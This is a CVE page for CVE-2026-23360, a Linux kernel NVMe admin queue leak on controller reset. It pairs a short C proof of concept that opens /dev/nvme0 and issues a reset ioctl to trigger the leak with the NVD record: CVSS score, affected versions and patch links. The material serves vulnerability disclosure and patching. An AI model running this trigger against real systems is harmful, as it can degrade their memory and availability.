CVE-2026-23360

#include <stdio.h> #include <fcntl.h> #include <unistd.h> #include <sys/ioctl.h> #include <linux/nvme_ioctl.h> /* * PoC for CVE-2026-23360 * Description: Trigger NVMe controller reset to cause admin queue leak. * Note: Requires access to /dev/nvme0 and appropriate permissions. */ int main() { int fd = open("/dev/nvme0", O_RDWR); if (fd < 0) { perror("open"); return 1; } // Triggering the reset calls the vulnerable path in nvme_alloc_admin_tag_set // without properly freeing the old queue. printf("Triggering reset to induce leak...\n"); if (ioctl(fd, NVME_IOCTL_RESET, NULL) < 0) { perror("ioctl"); } close(fd); return 0; }

{"cve": {"id": "CVE-2026-23360", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-03-25T11:16:34.907", "lastModified": "2026-04-24T18:59:28.380", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnvme: fix admin queue leak on controller reset\n\nWhen nvme_alloc_admin_tag_set() is called during a controller reset,\na previous admin queue may still exist. Release it properly before\nallocating a new one to avoid orphaning the old queue.\n\nThis fixes a regression introduced by commit 03b3bcd319b3 (\"nvme: fix\nadmin request_queue lifetime\")."}, {"lang": "es", "value": "En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\nnvme: corrige la fuga de la cola de administración al reiniciar el controlador\n\nCuando se llama a nvme_alloc_admin_tag_set() durante un reinicio del controlador, una cola de administración anterior aún puede existir. Libérela correctamente antes de asignar una nueva para evitar dejar huérfana la cola antigua.\n\nEsto corrige una regresión introducida por el commit 03b3bcd319b3 ('nvme: corrige la vida útil de request_queue de administración')."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-401"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.6.120", "versionEndExcluding": "6.6.131", "matchCriteriaId": "5A5BC13A-216B-45C3-A63E-D66C3FECFE85"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.12.62", "versionEndExcluding": "6.12.77", "matchCriteriaId": "F861E4B9-708D-4A3E-9295-278B155F4550"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.17.12", "versionEndExcluding": "6.18", "matchCriteriaId": "1FCE186E-ED64-4D23-A6C7-327D3D61F135"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.18.1", "versionEndExcluding": "6.18.17", "matchCriteriaId": "07E9D8CD-82F0-4CC6-8038-BF71758D583C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.7", "matchCriteriaId": "69245D10-0B71-485E-80C3-A64F077004D3"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.1.167:*:*:*:*:*:*:*", "matchCriteriaId": "B898A4FB-4E74-40F7-B523-B71FFB681B6D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.18:-:*:*:*:*:*:*", "matchCriteriaId": "DCE57113-2223-4308-A0F2-5E6ECFBB3C23"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "F253B622-8837-4245-BCE5-A7BF8FC76A16"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc2:*:*:*:*:*:*", "matchCriteriaId": "4AE85AD8-4641-4E7C-A2F4-305E2CD9EE64"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/089a6f17881a82c6c6e05f8564a867be0767eade", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/2efbc838a26d3da72d8fe05770bdf869d4ca3ac5", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/64f87b96de0e645a4c066c7cffd753f334446db6", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/6e28bab900e40e4d610b04f9f82e01983d8fb356", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/8eb2b3cdcd9b6631b94b82c1f4f6bc32b40d942f", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/b84bb7bd913d8ca2f976ee6faf4a174f91c02b8d", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/e159eb852aeee95443a9458ecb7d072bbb689913", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}